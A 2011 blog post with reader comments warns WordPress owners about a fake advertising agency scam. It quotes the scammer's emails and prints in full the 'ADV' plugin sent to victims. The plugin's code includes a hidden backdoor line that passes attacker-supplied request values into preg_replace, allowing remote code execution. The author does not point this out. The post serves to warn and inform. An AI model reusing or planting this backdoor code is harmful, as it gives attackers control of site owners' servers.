There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.
1. The first contact is through a comment on your site. This is the comment, details may change somewhat:
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00
2. Once you email the person, this is the reply:
> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00
3. After some questioning on my part, I received this email:
Hi! Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements. Best regards, Mathis Gaillard. site: www.izidaagency.com e-mail: mgaillard@izidaagency.com phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:
Hi!
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.izidaagency.com
To enter use the following data:
login: my other site
password: email me for password
You should install and activate the plugin in order to display advertisement.
Before making payment, advertiser must approve location of the banner.
The banner will be shown on your site when you add special code to your web- address
(for example: http://www.my other site.com/?adv_test=1).
It means, that visitors will see the banner only if it is approved and payment made.
To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install
To activate your site you have to enter the code: GQP-HFA-55H
What way of payment is suitable for you?
Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:
_____________________________________________________________________________________________
<?php /* Plugin Name: ADV Description: ADV Plugin Version: 2.6.1 */ class AdvWidget extends WP_Widget { function AdvWidget() { parent::WP_Widget(false, $name = 'AdvWidget'); } /** @see WP_Widget::widget */ function widget($args, $instance) { if (get_option('adv_place') == 'widget') advShowBanner(); } /** @see WP_Widget::update */ function update($new_instance, $old_instance) { $instance = $old_instance; $instance['title'] = strip_tags($new_instance['title']); return $instance; } function form($instance) { } } add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");')); add_action('admin_menu', 'advPluginMenu'); register_activation_hook(__FILE__, 'advActivation'); define('ADV_SERVICE_DOMAIN', 'izidaagency.com'); define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key'); function advReadUrl($url) { if (function_exists('curl_init')) { $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); $result = curl_exec($curl); curl_close($curl); return $result; } else return file_get_contents($url); } function advActivation() { update_option('adv_place', 'widget'); } register_deactivation_hook(__FILE__, 'advDeactivation'); function advDeactivation() { delete_option('adv_key'); } function advPluginMenu() { add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions'); } function adv_show_banner() { advShowBanner(); } function advShowBanner() { $advBanner = get_option('adv_banner'); $advMode = get_option('adv_mode'); if ($advBanner) { if (isset($_REQUEST['adv_test']) || $advMode == 'work') { echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>"; } } } function activateCode() { $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST'])); if (strpos($data, '<key>true</key>') !== FALSE) { preg_match("#<width>(.+?)</width>#", $data, $arr); update_option('adv_width', $arr[1]); preg_match("#<height>(.+?)</height>#", $data, $arr); update_option('adv_height', $arr[1]); echo '<div id="message"><p>The code is activated successfully.</p></div>'; update_option('adv_key', $_REQUEST['key']); downloadBanners(); } else { echo '<div id="message"><p>Code activation error.</p></div>'; } } function downloadBanners() { $bannersDir = ABSPATH . "/adv_banners"; if (!is_dir($bannersDir)) { mkdir($bannersDir); } $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key")); preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners); preg_match("|<adv>(.+?)</adv>|", $list, $adv); preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner); preg_match("|<mode>(.+?)</mode>|", $list, $mode); if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) { update_option("adv_banner", $showBanner[1]); update_option('adv_mode', $mode[1]); foreach ($banners[1] as $banner) { $advBannerDir = $bannersDir . "/" . $adv[1]; if (!is_dir($advBannerDir)) mkdir($advBannerDir); $arr = explode("/", $banner); if (count($arr) == 2) { $size = $arr[0]; $bfile = $arr[1]; if (!is_dir($advBannerDir . "/" . $size)) mkdir($advBannerDir . "/" . $size); file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner)); } } echo '<div id="message"><p>Banners are downloaded successfully.</p></div>'; } } if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6'); function advPluginOptions() { if (!current_user_can('manage_options')) { wp_die(__('You do not have sufficient permissions to access this page.')); } $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ''; if ($action == 'downloadBanners') { downloadBanners(); } elseif ($action == 'setPlace') { update_option('adv_place', $_REQUEST['adv_place']); } elseif ($action == 'saveKey') { activateCode(); } $advPlace = get_option('adv_place'); echo '<div>'; echo '<h2>ADV</h2>'; echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">'; echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>'; echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>'; echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>'; echo '</select>'; echo '<input type="submit" value="Save"/></form>'; echo '<div>'; if (get_option('adv_key') === FALSE) { echo '<h2>Activation Code</h2>'; echo '<form method="post" action="?page=adv-identifier&action=saveKey">'; echo '<input type="text" name="key"/>'; echo '<input type="submit" value="Activate"/>'; echo '</form>'; } else { $mode = get_option('adv_mode'); echo '<br/>Code: ' . get_option('adv_key'); echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>'; echo 'Mode: ' . $mode; if ($mode != 'work') { $url = get_option('siteurl') . "/?adv_test=1"; $link = "<a href='$url'>$url</a>"; echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link; } } echo '</div>'; echo '</div>';}?>
_____________________________________________________________________________
This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:
http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860
My comments are at the bottom of that page.
I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.
I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.
Thanks for reading!
I also had this comment sent to my site. thanks for the heads up
I had the same scam targeted on me too. Here’s my account on it (http://www.atpeaz.com/index.php/2011/wordpress-blogs-targeted-scam-beware-of-the-adv-zip-plugin/). All too familiar except for the agency’s name!
Thanks Ken. I’m glad that you worked out the php file. Your guess about it being an attempt to access the payment account is probably correct. This has been going on since 2007. I wonder how many accounts have been compromised?